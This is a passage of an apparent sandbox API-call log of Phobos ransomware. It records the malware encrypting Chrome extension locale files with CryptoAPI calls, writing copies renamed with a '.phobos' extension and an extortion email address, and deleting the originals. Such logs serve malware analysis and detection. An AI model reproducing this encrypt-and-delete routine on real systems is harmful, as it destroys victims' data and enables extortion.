hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.358] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.358] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.358] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.358] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.358] CloseHandle (hObject=0x148) returned 1 [0148.358] CloseHandle (hObject=0x188) returned 1 [0148.358] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json")) returned 1 [0148.359] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.359] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=203) returned 1 [0148.359] CloseHandle (hObject=0x188) returned 1 [0148.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json")) returned 0x2020 [0148.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.360] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.360] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.360] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.360] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcb, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0148.361] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0148.362] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.362] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.362] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.362] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.362] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.362] CloseHandle (hObject=0x188) returned 1 [0148.362] CloseHandle (hObject=0x148) returned 1 [0148.362] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json")) returned 1 [0148.363] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.364] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=217) returned 1 [0148.364] CloseHandle (hObject=0x148) returned 1 [0148.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json")) returned 0x2020 [0148.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.364] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.364] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.365] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.365] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.365] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd9, lpOverlapped=0x0) returned 1 [0148.366] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.366] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.367] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.367] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.367] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.367] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.367] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.367] CloseHandle (hObject=0x148) returned 1 [0148.367] CloseHandle (hObject=0x188) returned 1 [0148.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json")) returned 1 [0148.368] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.368] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=222) returned 1 [0148.368] CloseHandle (hObject=0x188) returned 1 [0148.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0148.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.369] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.369] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.369] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.369] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.369] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xde, lpOverlapped=0x0) returned 1 [0148.370] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.370] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.371] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.371] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.371] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.371] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.371] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.371] CloseHandle (hObject=0x188) returned 1 [0148.371] CloseHandle (hObject=0x148) returned 1 [0148.371] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json")) returned 1 [0148.372] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.372] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=224) returned 1 [0148.372] CloseHandle (hObject=0x148) returned 1 [0148.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0148.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.373] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.373] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.373] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.373] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.373] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe0, lpOverlapped=0x0) returned 1 [0148.374] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0148.374] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0148.375] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.375] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.375] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.375] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.375] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.375] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.375] CloseHandle (hObject=0x148) returned 1 [0148.375] CloseHandle (hObject=0x188) returned 1 [0148.375] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json")) returned 1 [0148.376] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, 